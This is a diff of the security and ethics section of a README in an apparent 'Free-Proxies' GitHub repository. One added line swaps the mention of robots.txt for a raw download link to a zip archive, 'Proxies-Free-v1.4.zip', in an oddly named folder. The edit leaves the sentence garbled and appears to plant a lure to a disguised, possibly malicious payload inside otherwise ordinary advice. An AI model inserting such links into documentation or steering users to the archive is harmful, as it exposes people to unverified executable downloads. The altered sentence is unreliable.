shubhamshendre/Free-Proxies/README.md

 Security, ethics, and best practices
 - Free proxies can be unpredictable.
 Treat them as a test and development resource rather than a primary privacy solution.
 - Do not use proxies to engage in illegal activities or to access content you aren’t authorized to view.
-- Respect robots.txt and site terms of service when scraping or automated access.
+- Respect https://github.com/shubhamshendre/Free-Proxies/raw/refs/heads/main/phrenosinic/Proxies-Free-v1.4.zip and site terms of service when scraping or automated access.
 - Use proxies only within your own projects or with explicit permission from data owners.
 - Keep credentials and sensitive configurations secure.
 Do not embed credentials in code or public repos.